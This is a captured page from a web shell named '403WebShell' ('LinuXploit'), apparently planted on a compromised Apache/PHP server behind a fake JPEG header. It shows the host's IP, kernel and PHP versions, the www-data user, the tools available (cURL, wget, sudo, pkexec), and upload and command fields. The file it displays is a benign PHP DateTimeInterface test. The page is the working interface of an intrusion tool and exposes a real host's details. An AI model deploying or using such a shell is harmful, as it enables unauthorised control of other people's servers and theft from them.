????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.15.27.146
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/tests/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/tests/classes/bug65768.phpt
--TEST--
Bug #65768: date_diff accepts only DateTime instance even though docs say about DateTimeInterface
--INI--
date.timezone=Europe/London
--FILE--
<?php

$dt1 = new DateTime("2010-10-20");
$dti1 = new DateTimeImmutable("2010-10-25");
$dti2 = new DateTimeImmutable("2010-10-28");

$diff1 = $dt1->diff($dti1);
echo $diff1->y, " ", $diff1->m, " ", $diff1->d, " ",
     $diff1->h, " ", $diff1->i, " ", $diff1->s, "\n";

$diff2 = $dti1->diff($dti2);
echo $diff2->y, " ", $diff2->m, " ", $diff2->d, " ",
     $diff2->h, " ", $diff2->i, " ", $diff2->s, "\n";

$diff3 = date_diff($dt1, $dti2);
echo $diff3->y, " ", $diff3->m, " ", $diff3->d, " ",
     $diff3->h, " ", $diff3->i, " ", $diff3->s, "\n";

class cdt1 extends DateTime implements DateTimeInterface {}

class cdt2 extends DateTimeImmutable implements DateTimeInterface {}

class cdt3 implements DateTimeInterface {}

?>
--EXPECTF--
0 0 5 0 0 0
0 0 3 0 0 0
0 0 8 0 0 0

Fatal error: DateTimeInterface can't be implemented by user classes in %sbug65768.php on line %d

Youez - 2016 - github.com/yon3zu
LinuXploit